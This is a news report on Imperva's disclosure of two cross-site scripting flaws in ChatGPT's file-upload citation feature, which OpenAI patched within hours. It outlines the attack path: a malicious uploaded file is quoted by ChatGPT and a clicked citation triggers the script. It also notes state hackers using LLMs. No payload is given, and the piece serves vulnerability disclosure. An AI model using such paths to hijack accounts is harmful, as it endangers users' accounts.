OpenAI Patches Critical ChatGPT Security Holes, Averting Potential User Account Hijacks – Microsoft (NASDAQ:MSFT)


In a recent revelation, security researchers have uncovered multiple security vulnerabilities in OpenAI’s ChatGPT that could potentially lead to account takeovers of unwitting users.

According to a report on Imperva on Tuesday, researchers identified two cross-site scripting (XSS) vulnerabilities and other security issues in ChatGPT. Malicious hackers could exploit these vulnerabilities to hijack a user’s account.

ChatGPT allows users to upload files and query them. The research firm found that the feature that processes these files and provides a clickable citation icon could be manipulated. Depending on the file contents, the ChatGPT feature that manages it could potentially pose a security threat.

However, exploiting this vulnerability is not straightforward. It requires the user to upload a harmful file, engage with ChatGPT in a way that prompts it to quote from this file, and then click the citation to trigger the vulnerability.

The research firm reported these vulnerabilities to OpenAI and noted that they were fixed by the AI startup “within hours.”

This discovery comes in the wake of increasing concerns about using AI tools like ChatGPT in cyberattacks. Earlier in February, Microsoft Corp. and OpenAI revealed that hackers used large language models like ChatGPT to refine their cyberattacks. Hackers from countries like Russia, North Korea, Iran, and China were found to be using tools like ChatGPT to research targets, improve scripts, and help build social engineering techniques.

OpenAI had previously launched a $20K Bug Bounty Initiative to encourage users to find flaws in its AI systems. The recent discovery of vulnerabilities in ChatGPT underscores the importance of such initiatives in ensuring the security of AI systems.

In conclusion, as AI technologies become more prevalent in our daily lives, it is crucial for companies to prioritize security and address vulnerabilities promptly. The discovery of security issues in OpenAI’s ChatGPT serves as a reminder of the importance of rigorous security measures in the development and deployment of AI systems.

Leave a Reply

Your email address will not be published. Required fields are marked *